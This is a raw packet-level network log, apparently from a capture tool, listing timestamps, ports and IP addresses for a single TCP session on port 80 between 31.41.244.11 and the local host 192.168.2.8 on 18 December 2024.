Dec 18, 2024 13:38:37.380470037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.380490065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.380498886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.380502939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.380516052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.380561113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.380561113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.381531954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381546021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381556988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381568909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.381570101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381582975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381594896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.381596088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.381630898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.382379055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382392883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382405996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382417917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382430077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382432938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.382443905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382453918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382462978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.382488012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.382493019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.382507086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.382539988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.383086920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.383100986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.383121014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.383147001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.383158922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.383172035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.383178949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.383204937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.383217096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384078979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384140015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384152889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384166002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384188890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384202003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384215117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384218931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384249926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384284973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384866953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384881020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.384922028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.384938955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.440862894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.440881014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.440893888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.440910101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.441050053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.441816092 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.441863060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.441896915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.442019939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.442079067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.442881107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.442949057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.442951918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.443001032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.443572998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.443631887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.443656921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.443708897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.444624901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.444681883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.444744110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.444793940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.445679903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.445738077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.445815086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.445863962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.446711063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.446770906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.446888924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.446938992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.447694063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.447757006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.447894096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.447946072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.448832989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.448894024 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.448929071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.448980093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.449922085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.449981928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.450011969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.450066090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.451000929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.451075077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.451085091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.451133966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.452204943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.452219009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.452259064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.452284098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.453007936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.453063965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.453212023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.453263998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.454096079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.454147100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.454289913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.454338074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.455358028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.455401897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.455418110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.455446959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.456243038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.456298113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.456412077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.456460953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.457305908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.457365990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.457498074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.457549095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.458425045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.458482027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.458482027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.458530903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.459630966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.459686995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.459701061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.459750891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.460588932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.460644960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.460767031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.460818052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.461519003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.461570978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.461793900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.461844921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.462663889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.462708950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.462713957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.462753057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.463838100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.463893890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.463928938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.463983059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.465238094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.465290070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.465555906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.465605974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.466690063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.466703892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.466744900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.466761112 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.467657089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.467706919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.467749119 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.467798948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.468812943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.468868971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.468945980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.468995094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.469809055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.469858885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.469868898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.469916105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.470669985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.470683098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.470724106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.470745087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.471712112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.471726894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.471770048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.472522974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.472574949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.472595930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.472644091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.473525047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.473576069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.473751068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.473799944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.474596024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.474644899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.474669933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.474718094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.475613117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.475625038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.475668907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.476429939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.476486921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.476608992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.476660013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.477577925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.477626085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.477685928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.477736950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.478538036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.478586912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.478643894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.478691101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.479774952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.479788065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.479830980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.480706930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.480757952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.480788946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.480835915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.481823921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.481837988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.481875896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.482763052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.482821941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.482947111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.482992887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.483772993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.483830929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.483920097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.483972073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.484865904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.484915018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.484987020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.485035896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.485940933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.485991001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.486114025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.486259937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.487025023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.487075090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.487102985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.487149954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.488068104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.488121033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.488153934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.488199949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.489253044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.489310980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.498684883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.498780012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.498869896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.498970985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.499012947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.499044895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.502134085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.502146959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.502188921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.502204895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.505768061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.505783081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.505824089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.505835056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.510349035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.510363102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.510436058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.515037060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.515049934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.515095949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.515125036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.518277884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.518313885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.518325090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.518332958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.518357038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.518378973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.521497965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.521567106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.632730961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.632843971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.632955074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.633014917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.633429050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.633477926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.634166956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.634215117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.634716988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.634730101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.634763956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.634784937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.636017084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.636074066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.636428118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.636473894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.637243032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.637257099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.637289047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.637307882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.638403893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.638462067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.638909101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.638922930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.638958931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.638976097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.640084982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.640098095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.640131950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.640146017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.641297102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.641309023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.641350985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.642553091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.642568111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.642600060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.642611980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.643802881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.643814087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.643851995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.643867970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.645104885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.645117998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.645158052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.646364927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.646379948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.646415949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.646435022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.647658110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.647670984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.647703886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.647722006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.649049044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.649085045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.649141073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.650381088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.650393963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.650464058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.651833057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.651846886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.651870012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.651885033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.651910067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.653376102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.653388977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.653399944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.653424025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.653441906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.654529095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.654547930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.654577971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.654597044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.655884027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.655896902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.655932903 CET	49715	80	192.168.2.8	31.41.244.11
